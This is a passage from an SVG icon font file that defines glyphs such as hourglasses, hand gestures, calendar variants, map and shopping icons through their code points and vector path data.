    <glyph glyph-name="i-cursor" unicode="&#xf246;" horiz-adv-x="256" 
d="M256 395.952c0 -6.64648 -5.4043 -12.0098 -12.0498 -11.9922c-27.875 0.0712891 -83.9502 -3.20996 -83.9502 -48.1416v-111.818h36c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-36v-112c0 -44.9395 57.8887 -48.5527 83.8555 -48.2422
c6.68652 0.0800781 12.1445 -5.31055 12.1445 -11.998v-39.6445c0 -6.5957 -5.31836 -11.957 -11.9131 -12c-35.0654 -0.228516 -78.3525 0.62207 -116.087 37.8447c-38.4688 -37.9482 -83.6211 -38.3027 -116.158 -37.8936
c-6.56738 0.0820312 -11.8418 5.42969 -11.8418 11.999v39.9824c0 6.64648 5.4043 12.0098 12.0498 11.9932c27.875 -0.0722656 83.9502 3.02734 83.9502 47.959v112h-36c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h36v111.818
c0 44.9385 -57.8887 48.7344 -83.8555 48.4248c-6.68652 -0.0800781 -12.1445 5.31055 -12.1445 11.998v39.6445c0 6.5957 5.31836 11.957 11.9131 12c35.0654 0.228516 78.3525 -0.62207 116.087 -37.8447c38.4688 37.9482 83.6211 38.3027 116.158 37.8926
c6.56738 -0.0820312 11.8418 -5.42969 11.8418 -11.999v-39.9824z" />
    <glyph glyph-name="object-group" unicode="&#xf247;" 
d="M480 320v-288h20c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v20h-384v-20c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h20v320h-20
c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-20h384v20c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-20v-32zM96 172c0 -6.62695 5.37305 -12 12 -12h168
c6.62695 0 12 5.37305 12 12v136c0 6.62695 -5.37305 12 -12 12h-168c-6.62695 0 -12 -5.37305 -12 -12v-136zM416 76v136c0 6.62695 -5.37305 12 -12 12h-84v-72c0 -13.2549 -10.7451 -24 -24 -24h-72v-52c0 -6.62695 5.37305 -12 12 -12h168c6.62695 0 12 5.37305 12 12z
" />
    <glyph glyph-name="object-ungroup" unicode="&#xf248;" horiz-adv-x="576" 
d="M64 128v-26c0 -3.31152 -2.68848 -6 -6 -6h-52c-3.31152 0 -6 2.68848 -6 6v52c0 3.31152 2.68848 6 6 6h26v192h-26c-3.31152 0 -6 2.68848 -6 6v52c0 3.31152 2.68848 6 6 6h52c3.31152 0 6 -2.68848 6 -6v-26h288v26c0 3.31152 2.68848 6 6 6h52
c3.31152 0 6 -2.68848 6 -6v-52c0 -3.31152 -2.68848 -6 -6 -6h-26v-192h26c3.31152 0 6 -2.68848 6 -6v-52c0 -3.31152 -2.68848 -6 -6 -6h-52c-3.31152 0 -6 2.68848 -6 6v26h-288zM544 192v-160h26c3.31152 0 6 -2.68848 6 -6v-52c0 -3.31152 -2.68848 -6 -6 -6h-52
c-3.31152 0 -6 2.68848 -6 6v26h-288v-26c0 -3.31152 -2.68848 -6 -6 -6h-52c-3.31152 0 -6 2.68848 -6 6v52c0 3.31152 2.68848 6 6 6h26v72h136v-8c0 -13.2549 10.7451 -24 24 -24h64c13.2549 0 24 10.7451 24 24v64c0 13.2549 -10.7451 24 -24 24h-8v72h104v26
c0 3.31152 2.68848 6 6 6h52c3.31152 0 6 -2.68848 6 -6v-52c0 -3.31152 -2.68848 -6 -6 -6h-26v-32z" />
    <glyph glyph-name="sticky-note" unicode="&#xf249;" horiz-adv-x="448" 
d="M312 128c-13.2002 0 -24 -10.7998 -24 -24v-136h-264c-13.2998 0 -24 10.7002 -24 24v400c0 13.2998 10.7002 24 24 24h400c13.2998 0 24 -10.7002 24 -24v-264h-136zM441 73l-98 -98c-4.5 -4.5 -10.5996 -7 -17 -7h-6v128h128v-6.09961
c0 -6.30078 -2.5 -12.4004 -7 -16.9004z" />
    <glyph glyph-name="clone" unicode="&#xf24d;" 
d="M464 448c26.5098 0 48 -21.4902 48 -48v-288c0 -26.5098 -21.4902 -48 -48 -48h-288c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h288zM176 32h208v-48c0 -26.5098 -21.4902 -48 -48 -48h-288c-26.5098 0 -48 21.4902 -48 48v288
c0 26.5098 21.4902 48 48 48h48v-208c0 -44.1123 35.8877 -80 80 -80z" />
    <glyph glyph-name="balance-scale" unicode="&#xf24e;" horiz-adv-x="640" 
d="M256 112c0 -44.1797 -57.3096 -80 -128 -80s-128 35.8203 -128 80h0.0195312c0 15.6699 -2.0791 7.25 85.04 181.51c17.6807 35.3604 68.2207 35.29 85.8701 0c86.3906 -172.779 85.0508 -165.33 85.0508 -181.51h0.0195312zM128 272l-72 -144h144zM639.98 112
c0 -44.1797 -57.29 -80 -127.98 -80s-128 35.8203 -128 80h0.0195312c0 15.6699 -2.0791 7.25 85.04 181.51c17.6807 35.3604 68.2207 35.29 85.8701 0c86.3906 -172.779 85.0508 -165.33 85.0508 -181.51zM440 128h144l-72 144zM528 0c8.83984 0 16 -7.16016 16 -16v-32
c0 -8.83984 -7.16016 -16 -16 -16h-416c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h176v294.75c-23.5195 10.29 -41.1602 31.4902 -46.3896 57.25h-129.61c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h144.36
c14.5996 19.3203 37.5498 32 63.6396 32s49.04 -12.6797 63.6396 -32h144.36c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-129.61c-5.22949 -25.7695 -22.8799 -46.96 -46.3896 -57.25v-294.75h176z" />
    <glyph glyph-name="hourglass-start" unicode="&#xf251;" horiz-adv-x="384" 
d="M360 448c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24c0 -90.9648 -51.0156 -167.734 -120.842 -192c69.8262 -24.2656 120.842 -101.035 120.842 -192c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24h-336
c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24c0 90.9648 51.0156 167.734 120.842 192c-69.8262 24.2656 -120.842 101.035 -120.842 192c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h336zM296 0c0 77.4834 -46.2139 144 -104 144
c-57.7959 0 -104 -66.542 -104 -144h208z" />
    <glyph glyph-name="hourglass-half" unicode="&#xf252;" horiz-adv-x="384" 
d="M360 448c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24c0 -90.9648 -51.0156 -167.734 -120.842 -192c69.8262 -24.2656 120.842 -101.035 120.842 -192c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24h-336
c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24c0 90.9648 51.0156 167.734 120.842 192c-69.8262 24.2656 -120.842 101.035 -120.842 192c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h336zM284.922 64
c-17.0596 46.8037 -52.1006 80 -92.9219 80c-40.8242 0 -75.8613 -33.2031 -92.9199 -80h185.842zM284.941 320c7.07129 19.4131 11.0586 41.1953 11.0586 64h-208c0 -22.748 3.98828 -44.5479 11.0781 -64h185.863z" />
    <glyph glyph-name="hourglass-end" unicode="&#xf253;" horiz-adv-x="384" 
d="M360 384c0 -90.9648 -51.0156 -167.734 -120.842 -192c69.8262 -24.2656 120.842 -101.035 120.842 -192c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24h-336c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24
c0 90.9648 51.0156 167.734 120.842 192c-69.8262 24.2656 -120.842 101.035 -120.842 192c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h336c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24zM192 240c57.4902 0 104 66.0547 104 144
h-208c0 -77.4824 46.2129 -144 104 -144z" />
    <glyph glyph-name="hourglass" unicode="&#xf254;" horiz-adv-x="384" 
d="M360 384c0 -90.9648 -51.0156 -167.734 -120.842 -192c69.8262 -24.2656 120.842 -101.035 120.842 -192c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24h-336c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24
c0 90.9648 51.0156 167.734 120.842 192c-69.8262 24.2656 -120.842 101.035 -120.842 192c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h336c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24z" />
    <glyph glyph-name="hand-rock" unicode="&#xf255;" 
d="M464.8 368c26.2998 -0.400391 47.2002 -22.5 47.2002 -48.7998v-133.5c0 -12.7998 -2.5 -25.5 -7.5 -37.2998l-49 -116.301c-4.90039 -11.7998 -7.5 -24.5 -7.5 -37.2998v-2.89941c0 -13.3008 -10.7002 -24 -24 -24h-240c-13.2998 0 -24 10.6992 -24 24v6.69922
c0 13.7002 -5.90039 26.8008 -16.0996 35.9004l-111.7 99.2998c-20.5 18.2998 -32.2002 44.4004 -32.2002 71.7998v66.4004c0 26.7998 21.9004 48.4004 48.7998 48c26.2998 -0.5 47.2002 -22.5 47.2002 -48.7998v-48.1006l8 -7.09961v136
c0 26.7998 21.9004 48.4004 48.7998 48c26.2998 -0.5 47.2002 -22.5 47.2002 -48.7998v-31.2002h8v48c0 26.7998 21.9004 48.4004 48.7998 48c26.2998 -0.5 47.2002 -22.5 47.2002 -48.7998v-47.2002h8v32c0 26.7998 21.9004 48.4004 48.7998 48
c26.2998 -0.5 47.2002 -22.5 47.2002 -48.7998v-31.2002h8c0 26.7998 21.9004 48.4004 48.7998 48z" />
    <glyph glyph-name="hand-paper" unicode="&#xf256;" horiz-adv-x="447" 
d="M408.781 319.993c21.7305 -0.416016 39.2188 -18.1621 39.2178 -39.9932v-150.359c0 -12.2998 -2.28711 -32.001 -5.10449 -43.9746l-26.5078 -112.66c-5.10156 -21.6816 -24.4502 -37.0059 -46.7236 -37.0059h-197.59c-13.4922 0 -30.8838 8.85645 -38.8193 19.7676
l-125.601 172.705c-12.9932 17.8672 -9.04297 42.8838 8.82129 55.877c17.8682 12.9941 42.8848 9.04297 55.877 -8.82227l31.6484 -43.5195v235.992c0 21.8311 17.4883 39.5771 39.2188 39.9932c22.4248 0.428711 40.7812 -18.3535 40.7812 -40.7832v-175.21h8v216
c0 21.8311 17.4883 39.5771 39.2188 39.9932c22.4248 0.428711 40.7812 -18.3535 40.7812 -40.7832v-215.21h8v177c0 21.8311 17.4883 39.5771 39.2188 39.9932c22.4248 0.428711 40.7812 -18.3535 40.7812 -40.7832v-176.21h8v87.21
c0 22.4297 18.3564 41.2119 40.7812 40.7832z" />
    <glyph glyph-name="hand-scissors" unicode="&#xf257;" 
d="M216 8c0 22.0918 17.9092 40 40 40v8h-32c-22.0908 0 -40 17.9082 -40 40s17.9092 40 40 40h32v8h-208c-26.5098 0 -48 21.4902 -48 48s21.4902 48 48 48h208v13.5723l-177.551 69.7393c-24.6738 9.69434 -36.8184 37.5557 -27.125 62.2285
c9.69238 24.6738 37.5537 36.8174 62.2275 27.124l190.342 -74.7646l24.8721 31.0898c12.3066 15.3809 33.9785 19.5146 51.0811 9.74121l112 -64c11.125 -6.3584 20.1533 -21.917 20.1533 -34.7305v-240c0 -18.5615 -12.7695 -34.6855 -30.8379 -38.9365l-136 -32
c-2.49414 -0.586914 -6.59668 -1.06348 -9.1582 -1.06348h-0.00390625h-80c-22.0908 0 -40 17.9082 -40 40z" />
    <glyph glyph-name="hand-lizard" unicode="&#xf258;" horiz-adv-x="576" 
d="M384 -32v61.4609c0 7.28906 -4.99707 16.3711 -11.1543 20.2734l-111.748 70.8105c-6.49316 4.11523 -18.0029 7.45508 -25.6904 7.45508h-0.000976562h-147.406c-13.2549 0 -24 10.7451 -24 24v8c0 35.3457 28.6543 64 64 64h123.648
c11.7754 0 25.0088 8.82227 29.5371 19.6924l21.4102 51.3848c4.94141 11.8555 -3.77051 24.9229 -16.6143 24.9229h-229.981c-30.9277 0 -56 25.0723 -56 56v16c0 13.2549 10.7451 24 24 24h333.544c14.6035 0 32.7852 -10.0205 40.583 -22.3682l163.04 -258.146
c8.1875 -12.9639 14.833 -35.9297 14.833 -51.2627v-0.000976562v-116.222h-192z" />
    <glyph glyph-name="hand-spock" unicode="&#xf259;" 
d="M481.3 350.9c21.4004 -5.10059 34.7002 -26.7002 29.7002 -48.2002l-36.2998 -152.5c-1.7002 -7.2002 -2.60059 -14.7002 -2.60059 -22.2002v-42c0 -9.2998 -1.39941 -18.4004 -4 -27.2998l-26.1992 -88.2998c-6 -20.4004 -24.7002 -34.4004 -46 -34.4004h-216.7
c-12.2002 0 -24 4.59961 -32.9004 13l-133.7 125.9c-16.0996 15.0996 -16.7998 40.3994 -1.69922 56.5c15.0996 16.0996 40.3994 16.7998 56.5 1.69922l60.5996 -57v79.4004l-39 171.6c-4.90039 21.6006 8.59961 43 30.0996 47.9004
c21.6006 4.90039 43 -8.59961 47.9004 -30.0996l34.7998 -152.801h9.7998l-47.5996 207c-5 21.5 8.5 43 30 47.9004c21.5996 4.90039 43 -8.5 48 -30.0996l51.7002 -224.9h15.0996l48.4004 193.7c5.39941 21.3994 27.0996 34.5 48.5 29.0996
c21.3994 -5.39941 34.5 -27.0996 29.0996 -48.5l-43.5996 -174.3h11.0996l30.7998 129.3c5.10059 21.4004 26.7002 34.7002 48.2002 29.6006z" />
    <glyph glyph-name="hand-pointer" unicode="&#xf25a;" horiz-adv-x="448" 
d="M448 208v-96c0 -3.08398 -0.356445 -6.15918 -1.06348 -9.16211l-32 -136c-4.25098 -18.0684 -20.375 -30.8379 -38.9365 -30.8379h-208c-11.2432 0 -25.7363 7.37988 -32.3496 16.4727l-127.997 176c-12.9932 17.8662 -9.04297 42.8838 8.82129 55.876
c17.8672 12.9941 42.8848 9.04297 55.877 -8.82227l31.6484 -43.5186v275.992c0 22.0908 17.9082 40 40 40s40 -17.9092 40 -40v-200h8v40c0 22.0908 17.9082 40 40 40s40 -17.9092 40 -40v-40h8v24c0 22.0908 17.9082 40 40 40s40 -17.9092 40 -40v-24h8
c0 22.0908 17.9082 40 40 40s40 -17.9092 40 -40zM192 128h-8v-96h8v96zM280 128h-8v-96h8v96zM368 128h-8v-96h8v96z" />
    <glyph glyph-name="hand-peace" unicode="&#xf25b;" horiz-adv-x="448" 
d="M408 232c22.0918 0 40 -17.9092 40 -40v-80v-0.00488281c0 -2.56152 -0.476562 -6.66406 -1.06348 -9.15723l-32 -136c-4.25098 -18.0684 -20.375 -30.8379 -38.9365 -30.8379h-240h-0.000976562c-12.8125 0 -28.3711 9.0293 -34.7275 20.1543l-64 112
c-9.77441 17.1025 -5.64062 38.7744 9.74023 51.0811l31.0898 24.8721l-74.7646 190.342c-9.69336 24.6738 2.4502 52.5342 27.124 62.2266c24.6729 9.69434 52.5332 -2.4502 62.2275 -27.125l69.7393 -177.551h13.5723v208c0 26.5098 21.4902 48 48 48s48 -21.4902 48 -48
v-208h8v32c0 22.0908 17.9082 40 40 40s40 -17.9092 40 -40v-32h8c0 22.0908 17.9082 40 40 40z" />
    <glyph glyph-name="trademark" unicode="&#xf25c;" horiz-adv-x="640" 
d="M260.6 352c6.60059 0 12 -5.40039 11.9004 -12v-43.0996c0 -6.60059 -5.40039 -12 -12 -12h-85.0996v-240.9c0 -6.59961 -5.40039 -12 -12 -12h-54.3008c-6.59961 0 -12 5.40039 -12 12v240.9h-85.0996c-6.59961 0 -12 5.39941 -12 12v43.0996
c0 6.59961 5.40039 12 12 12h248.6zM640 45c0.5 -7 -5 -13 -12 -13h-53.9004c-6.2998 0 -11.5996 4.90039 -12 11.2002l-9.09961 132.899c-1.7998 24.2002 0 53.7002 0 53.7002h-0.900391s-10.6992 -33.5996 -17.8994 -53.7002l-30.7002 -84.6992
c-1.7002 -4.7002 -6.2002 -7.90039 -11.2998 -7.90039h-50.2998c-5.10059 0 -9.60059 3.2002 -11.3008 7.90039l-30.6992 84.6992c-7.2002 20.1006 -17.9004 53.7002 -17.9004 53.7002h-0.900391s1.80078 -29.5 0 -53.7002l-9.09961 -132.899
c-0.5 -6.2998 -5.7002 -11.2002 -12 -11.2002h-54.5c-7.09961 0 -12.5996 6 -12 13l24.4004 296c0.599609 6.2002 5.7998 11 12 11h65.3994c5.10059 0 9.60059 -3.2998 11.2998 -8.09961l43.8008 -127.101c7.19922 -20.5996 16.0996 -52.7998 16.0996 -52.7998h0.900391
s8.89941 32.2002 16.0996 52.7998l43.7998 127.101c1.60059 4.7998 6.2002 8.09961 11.2998 8.09961h65.4004c6.2998 0 11.5 -4.7998 12 -11z" />
    <glyph glyph-name="registered" unicode="&#xf25d;" 
d="M285.363 240.525c0 -18.6006 -9.83105 -28.4316 -28.4316 -28.4316h-29.876v56.1406h23.3779c28.668 0 34.9297 -8.77344 34.9297 -27.709zM504 192c0 -136.967 -111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248s248 -111.033 248 -248z
M363.411 87.5859c-46.7295 84.8252 -43.2988 78.6357 -44.7021 80.9805c23.4316 15.1719 37.9453 42.9785 37.9453 74.4854c0 54.2441 -31.5 89.252 -105.498 89.252h-70.667c-13.2549 0 -24 -10.7451 -24 -24v-232.304c0 -13.2549 10.7451 -24 24 -24h22.5664
c13.2549 0 24 10.7451 24 24v71.6631h25.5566l44.1289 -82.9375c3.73828 -7.02441 13.2305 -12.7266 21.1875 -12.7266h24.4639c18.2617 0.000976562 29.8291 19.5908 21.0186 35.5869z" />
    <glyph glyph-name="tv" unicode="&#xf26c;" horiz-adv-x="640" 
d="M592 448c26.5 0 48 -21.5 48 -48v-320c0 -26.5 -21.5 -48 -48 -48h-234.9v-32h160c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32h-384c-17.6992 0 -32 14.2998 -32 32s14.3008 32 32 32h160v32h-245.1c-26.5 0 -48 21.5 -48 48v320c0 26.5 21.5 48 48 48h544z
M576 96v288h-512v-288h512z" />
    <glyph glyph-name="calendar-plus" unicode="&#xf271;" horiz-adv-x="448" 
d="M436 288h-424c-6.59961 0 -12 5.40039 -12 12v36c0 26.5 21.5 48 48 48h48v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48v-36
c0 -6.59961 -5.40039 -12 -12 -12zM12 256h424c6.59961 0 12 -5.40039 12 -12v-260c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v260c0 6.59961 5.40039 12 12 12zM328 116c0 6.59961 -5.40039 12 -12 12h-60v60c0 6.59961 -5.40039 12 -12 12h-40
c-6.59961 0 -12 -5.40039 -12 -12v-60h-60c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h60v-60c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v60h60c6.59961 0 12 5.40039 12 12v40z" />
    <glyph glyph-name="calendar-minus" unicode="&#xf272;" horiz-adv-x="448" 
d="M436 288h-424c-6.59961 0 -12 5.40039 -12 12v36c0 26.5 21.5 48 48 48h48v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48v-36
c0 -6.59961 -5.40039 -12 -12 -12zM12 256h424c6.59961 0 12 -5.40039 12 -12v-260c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v260c0 6.59961 5.40039 12 12 12zM316 64c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-184
c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h184z" />
    <glyph glyph-name="calendar-times" unicode="&#xf273;" horiz-adv-x="448" 
d="M436 288h-424c-6.59961 0 -12 5.40039 -12 12v36c0 26.5 21.5 48 48 48h48v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48v-36
c0 -6.59961 -5.40039 -12 -12 -12zM12 256h424c6.59961 0 12 -5.40039 12 -12v-260c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v260c0 6.59961 5.40039 12 12 12zM269.3 96l48.1006 48.0996c4.69922 4.7002 4.69922 12.3008 0 17l-28.3008 28.3008
c-4.69922 4.69922 -12.2998 4.69922 -17 0l-48.0996 -48.1006l-48.0996 48.1006c-4.7002 4.69922 -12.3008 4.69922 -17 0l-28.3008 -28.3008c-4.69922 -4.69922 -4.69922 -12.2998 0 -17l48.1006 -48.0996l-48.1006 -48.0996c-4.69922 -4.7002 -4.69922 -12.3008 0 -17
l28.3008 -28.3008c4.69922 -4.69922 12.2998 -4.69922 17 0l48.0996 48.1006l48.0996 -48.1006c4.7002 -4.69922 12.3008 -4.69922 17 0l28.3008 28.3008c4.69922 4.69922 4.69922 12.2998 0 17z" />
    <glyph glyph-name="calendar-check" unicode="&#xf274;" horiz-adv-x="448" 
d="M436 288h-424c-6.62695 0 -12 5.37305 -12 12v36c0 26.5098 21.4902 48 48 48h48v52c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-52h128v52c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-52h48c26.5098 0 48 -21.4902 48 -48v-36
c0 -6.62695 -5.37305 -12 -12 -12zM12 256h424c6.62695 0 12 -5.37305 12 -12v-260c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v260c0 6.62695 5.37305 12 12 12zM345.296 160.053l-28.1689 28.3984
c-4.66699 4.70508 -12.2646 4.73535 -16.9697 0.0673828l-106.037 -105.184l-45.9805 46.3516c-4.66699 4.70508 -12.2656 4.73633 -16.9707 0.0683594l-28.3965 -28.1699c-4.70508 -4.66699 -4.73633 -12.2646 -0.0683594 -16.9697l82.6006 -83.2695
c4.66699 -4.70508 12.2656 -4.73535 16.9707 -0.0673828l142.952 141.805c4.70508 4.66699 4.73633 12.2646 0.0683594 16.9697z" />
    <glyph glyph-name="industry" unicode="&#xf275;" 
d="M475.115 284.219c15.9541 10.1514 36.8848 -1.33105 36.8848 -20.248v-271.971c0 -13.2549 -10.7451 -24 -24 -24h-464c-13.2549 0 -24 10.7451 -24 24v400c0 13.2549 10.7451 24 24 24h112c13.2549 0 24 -10.7451 24 -24v-196.309l139.115 88.5273
c15.9541 10.1514 36.8848 -1.33203 36.8848 -20.248v-68.2793z" />
    <glyph glyph-name="map-pin" unicode="&#xf276;" horiz-adv-x="288" 
d="M112 131.06c10.3896 -1.91992 21.0596 -3.05957 32 -3.05957s21.6104 1.13965 32 3.05957v-156.689l-22.0098 -33.0205c-4.75 -7.11914 -15.2207 -7.11914 -19.9707 0l-22.0195 33.0205v156.689zM144 448c79.5303 0 144 -64.4697 144 -144s-64.4697 -144 -144 -144
s-144 64.4697 -144 144s64.4697 144 144 144zM144 372c6.62012 0 12 5.37988 12 12s-5.37988 12 -12 12c-50.7197 0 -92 -41.2695 -92 -92c0 -6.62012 5.37988 -12 12 -12s12 5.37988 12 12c0 37.5 30.5 68 68 68z" />
    <glyph glyph-name="map-signs" unicode="&#xf277;" 
d="M507.31 363.31c6.25 -6.25 6.25 -16.3691 0 -22.6299l-43.3096 -43.3096c-6.00977 -6 -14.1396 -9.37012 -22.6299 -9.37012h-385.37c-13.25 0 -24 10.75 -24 24v80c0 13.25 10.75 24 24 24h168v16c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-16
h153.37c8.49023 0 16.6299 -3.37012 22.6299 -9.37012zM224 -48v112h64v-112c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16zM456 224c13.25 0 24 -10.75 24 -24v-80c0 -13.25 -10.75 -24 -24 -24h-385.37
c-8.49023 0 -16.6299 3.37012 -22.6299 9.37012l-43.3096 43.3096c-6.25 6.25 -6.25 16.3799 0 22.6299l43.3096 43.3203c6.00977 6 14.1396 9.37012 22.6299 9.37012h153.37v32h64v-32h168z" />
    <glyph glyph-name="map" unicode="&#xf279;" horiz-adv-x="576" 
d="M0 330.34c0.00292969 11.959 9.0166 25.2686 20.1201 29.71l139.88 55.9502v-384l-138.06 -62.8398c-10.5107 -4.2002 -21.9404 3.54004 -21.9404 14.8594v346.32zM192 32v384l192 -64v-384zM554.06 414.84c10.5107 4.2002 21.9404 -3.54004 21.9404 -14.8594v-346.32
c0 -11.9609 -9.01367 -25.2705 -20.1201 -29.71l-139.88 -55.9502v384z" />
    <glyph glyph-name="comment-alt" unicode="&#xf27a;" 
d="M448 448c35.2998 0 64 -28.7002 64 -64v-288c0 -35.2998 -28.7002 -64 -64 -64h-144l-124.9 -93.7002c-7.89941 -5.7998 -19.0996 -0.0996094 -19.0996 9.7002v84h-96c-35.2998 0 -64 28.7002 -64 64v288c0 35.2998 28.7002 64 64 64h384z" />
    <glyph glyph-name="pause-circle" unicode="&#xf28b;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM240 112v160c0 8.7998 -7.2002 16 -16 16h-48c-8.7998 0 -16 -7.2002 -16 -16v-160c0 -8.7998 7.2002 -16 16 -16h48c8.7998 0 16 7.2002 16 16zM352 112v160
c0 8.7998 -7.2002 16 -16 16h-48c-8.7998 0 -16 -7.2002 -16 -16v-160c0 -8.7998 7.2002 -16 16 -16h48c8.7998 0 16 7.2002 16 16z" />
    <glyph glyph-name="stop-circle" unicode="&#xf28d;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM352 112v160c0 8.7998 -7.2002 16 -16 16h-160c-8.7998 0 -16 -7.2002 -16 -16v-160c0 -8.7998 7.2002 -16 16 -16h160c8.7998 0 16 7.2002 16 16z" />
    <glyph glyph-name="shopping-bag" unicode="&#xf290;" horiz-adv-x="448" 
d="M352 288h96v-272c0 -44.1826 -35.8174 -80 -80 -80h-288c-44.1826 0 -80 35.8174 -80 80v272h96v32c0 70.5801 57.4199 128 128 128c70.5791 0 128 -57.4199 128 -128v-32zM160 320v-32h128v32c0 35.29 -28.71 64 -64 64s-64 -28.71 -64 -64zM320 200
c13.2549 0 24 10.7451 24 24s-10.7451 24 -24 24s-24 -10.7451 -24 -24s10.7451 -24 24 -24zM128 200c13.2549 0 24 10.7451 24 24s-10.7451 24 -24 24s-24 -10.7451 -24 -24s10.7451 -24 24 -24z" />
    <glyph glyph-name="shopping-basket" unicode="&#xf291;" horiz-adv-x="576" 
d="M576 232v-16c0 -13.2549 -10.7451 -24 -24 -24h-8l-26.1133 -182.788c-3.37793 -23.6465 -23.6299 -41.2119 -47.5166 -41.2119h-364.74c-23.8867 0 -44.1387 17.5654 -47.5176 41.2119l-26.1123 182.788h-8c-13.2549 0 -24 10.7451 -24 24v16
c0 13.2549 10.7451 24 24 24h67.3408l106.78 146.821c10.3945 14.292 30.4072 17.4531 44.7012 7.05762c14.293 -10.3945 17.4531 -30.4082 7.05762 -44.7012l-79.4033 -109.178h235.047l-79.4033 109.179c-10.3955 14.292 -7.23438 34.3066 7.05859 44.7012
c14.291 10.3955 34.3066 7.23535 44.7012 -7.05762l106.779 -146.822h67.3408c13.2549 0 24 -10.7451 24 -24zM312 56v112c0 13.2549 -10.7451 24 -24 24s-24 -10.7451 -24 -24v-112c0 -13.2549 10.7451 -24 24 -24s24 10.7451 24 24zM424 56v112
c0 13.2549 -10.7451 24 -24 24s-24 -10.7451 -24 -24v-112c0 -13.2549 10.7451 -24 24 -24s24 10.7451 24 24zM200 56v112c0 13.2549 -10.7451 24 -24 24s-24 -10.7451 -24 -24v-112c0 -13.2549 10.7451 -24 24 -24s24 10.7451 24 24z" />
    <glyph glyph-name="hashtag" unicode="&#xf292;" horiz-adv-x="448" 
d="M440.667 265.891c-0.974609 -5.45898 -6.2666 -9.89062 -11.8135 -9.89062h-79.0957l-22.8564 -128h74.8096c7.4707 0 13.126 -6.75391 11.8135 -14.1094l-7.14355 -40c-0.974609 -5.45898 -6.2666 -9.89062 -11.8125 -9.89062h-79.0967l-15.377 -86.1094
c-0.974609 -5.45898 -6.2666 -9.89062 -11.8125 -9.89062h-40.6318c-7.47266 0 -13.127 6.75391 -11.8135 14.1094l14.623 81.8906h-98.6338l-15.3779 -86.1094c-0.974609 -5.45898 -6.26758 -9.89062 -11.8135 -9.89062h-40.6318
c-7.4707 0 -13.126 6.75391 -11.8125 14.1094l14.623 81.8906h-74.8105c-7.4707 0 -13.126 6.75391 -11.8125 14.1094l7.14258 40c0.974609 5.45898 6.2666 9.89062 11.8135 9.89062h79.0957l22.8564 128h-74.8096c-7.4707 0 -13.126 6.75391 -11.8135 14.1094l7.14355 40
